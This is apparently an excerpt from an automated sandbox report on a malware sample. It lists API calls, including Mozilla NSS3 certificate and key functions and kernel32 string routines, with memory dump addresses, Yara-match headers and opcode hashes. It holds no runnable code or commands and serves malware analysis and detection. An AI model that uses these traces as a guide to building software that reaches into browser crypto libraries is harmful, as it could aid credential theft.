                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                                              • API String ID: 2716131235-2206825331
                                                                                                                                                                                                                              • Opcode ID: fbddb8a4e1c594a933e7f5ec801fcf48d07bcb9d16b4c624cc4eb7c044a53e2b
                                                                                                                                                                                                                              • Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbddb8a4e1c594a933e7f5ec801fcf48d07bcb9d16b4c624cc4eb7c044a53e2b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcatlstrcpy
                                                                                                                                                                                                                              • String ID: 6F@$6F@
                                                                                                                                                                                                                              • API String ID: 3905823039-140834422
                                                                                                                                                                                                                              • Opcode ID: 440993b910aec4deeea6f7564bf60b3cb15d7b14a3809c27b2b17703e3e2872f
                                                                                                                                                                                                                              • Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440993b910aec4deeea6f7564bf60b3cb15d7b14a3809c27b2b17703e3e2872f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C9BC5AD
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B
                                                                                                                                                                                                                              • CERT_DecodeCertPackage.NSS3(?,?,6C9BC610,?), ref: 6C9BC5C2
                                                                                                                                                                                                                                • Part of subcall function 6C9BC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9BC0E6
                                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C9BC5E0
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9BC5EF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1454898856-0
                                                                                                                                                                                                                              • Opcode ID: 99bf3b7ce33ef374376518491d32ccceb79b2b36964b2b085a22e9191c3e7b7f
                                                                                                                                                                                                                              • Instruction ID: da6955fd46d97343f528af077390c7eb015821ef3b733599db1c296b6c12a867
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99bf3b7ce33ef374376518491d32ccceb79b2b36964b2b085a22e9191c3e7b7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4801F2B1E00205BBEB04AB64EC06EBF7B78DB20608F454169EC05AB341F671E919C6E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C98C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C98C154,?), ref: 6C9B24FA
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000,?,6C98C154,?), ref: 6C9B2509
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C9B2525
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C9B2532
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 929835568-0
                                                                                                                                                                                                                              • Opcode ID: e19d31a39cbc2d68221687180ab60f55a8c7affa6ea4f264b197c39e688e0ea7
                                                                                                                                                                                                                              • Instruction ID: 1670686f3907287d6aad7711648d3aae0a4c0ceda071012132cd1e2274f0cd7f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e19d31a39cbc2d68221687180ab60f55a8c7affa6ea4f264b197c39e688e0ea7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F036B670622637FB1025BA6D59E7739ACDB416F9B240231BD29D66C0D976C80181F1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC2D
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: TlsGetValue.KERNEL32(?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE10
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: EnterCriticalSection.KERNEL32(?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE24
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C97D079,00000000,00000001), ref: 6C99AE5A
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE6F
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AE7F
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: TlsGetValue.KERNEL32(?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AEB1
                                                                                                                                                                                                                                • Part of subcall function 6C99ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C97CDBB,?,6C97D079,00000000,00000001), ref: 6C99AEC9
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC44
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C9E5D40,00000000,?,?,6C9D6AC6,6C9E639C), ref: 6C9FAC59
                                                                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6C9D6AC6,6C9E639C,?,?,?,?,?,?,?,?,?,6C9E5D40,00000000,?,6C9EAAD4), ref: 6C9FAC62
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1595327144-0
                                                                                                                                                                                                                              • Opcode ID: 7f4a4517221c04f28fd54e8a1c7825336c131ea327b21567041a7efed3df8628
                                                                                                                                                                                                                              • Instruction ID: 9d8ef6afbdc1b097c83c6847eb98e751bb369471dca9b897e90b966af66b308b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f4a4517221c04f28fd54e8a1c7825336c131ea327b21567041a7efed3df8628
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB016DB5A002049FDB00DF55E8D0B5677BCEF64B5CF188068E9598F706EB35E849CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(40C70845,?,6C9E4710,?,000F4240,00000000), ref: 6C9E046B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6C9E4710,?,000F4240,00000000), ref: 6C9E0479
                                                                                                                                                                                                                                • Part of subcall function 6C9FBF80: TlsGetValue.KERNEL32(00000000,?,6C9E461B,-00000004), ref: 6C9FC244
                                                                                                                                                                                                                              • PR_Unlock.NSS3(40C70845,?,6C9E4710,?,000F4240,00000000), ref: 6C9E0492
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE89D,00000000,?,6C9E4710,?,000F4240,00000000), ref: 6C9E04A5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$LastMutexReleaseUnlockValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4014558462-0
                                                                                                                                                                                                                              • Opcode ID: 00e51fbfb1e558b10497fabb90c7bb185b26a5e8cc8ee7d9d139f81e3cabe1ff
                                                                                                                                                                                                                              • Instruction ID: d3110ac6fb452bd11730e138e0ecfe7bc0d3024119626362d85ec15929f17735
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00e51fbfb1e558b10497fabb90c7bb185b26a5e8cc8ee7d9d139f81e3cabe1ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FF0B470B003466BEB02AFB69E18B5E32AD9F3520DF44D434E81AC7E91FE21E4459621
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                                                                                                              • Opcode ID: 313c4764560caa2e4260a92e5bf8e19be838de3e0624e872d5dfaa6e6c0ffe9a
                                                                                                                                                                                                                              • Instruction ID: 61aebceb25de774c60b564fadc5c2449229d67b31c337ab8ceb06f60532d5486
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313c4764560caa2e4260a92e5bf8e19be838de3e0624e872d5dfaa6e6c0ffe9a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE0307670070A9BDA10EFA8DC4489A77ACEE492743154525E691C3700D237F905CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SystemTimelstrcpy
                                                                                                                                                                                                                              • String ID: #F@$#F@
                                                                                                                                                                                                                              • API String ID: 62757014-661595268
                                                                                                                                                                                                                              • Opcode ID: faffdbc4076bd0e333414d0f88bdbb3204a0d781b569a1e069408a4855883834
                                                                                                                                                                                                                              • Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faffdbc4076bd0e333414d0f88bdbb3204a0d781b569a1e069408a4855883834
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$calloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3339632435-0
                                                                                                                                                                                                                              • Opcode ID: eb85e5a533272dc9b43b985b689c60a59fe84d99295a99998307a0e3cd30e2bd
                                                                                                                                                                                                                              • Instruction ID: b245643ad317866a8006f904dcaf652b4e55ee90c8e306c2cf8c7d2cbeb118f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb85e5a533272dc9b43b985b689c60a59fe84d99295a99998307a0e3cd30e2bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D31E9F06443869BEB045F7CCA4466E77B8BF15348F01A66DE88997A21EB34D486CB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C90A468,00000000), ref: 6C90A4F9
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C90A468,00000000), ref: 6C90A51B
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C90A468,?,6C90A468,00000000), ref: 6C90A545
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000001,6C90A468,00000001,?,?,?,6C90A468,00000000), ref: 6C90A57D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3396830738-0
                                                                                                                                                                                                                              • Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                                                                                                                                                              • Instruction ID: 383bb17051812dfebb8ec7577971b1c3ef9d4d6c8b0ff68070e06fa8bf643e98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11DAB3E0031557DB0089BA9C816AF77DDAF55278F280239ED149B780FA35D94886E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%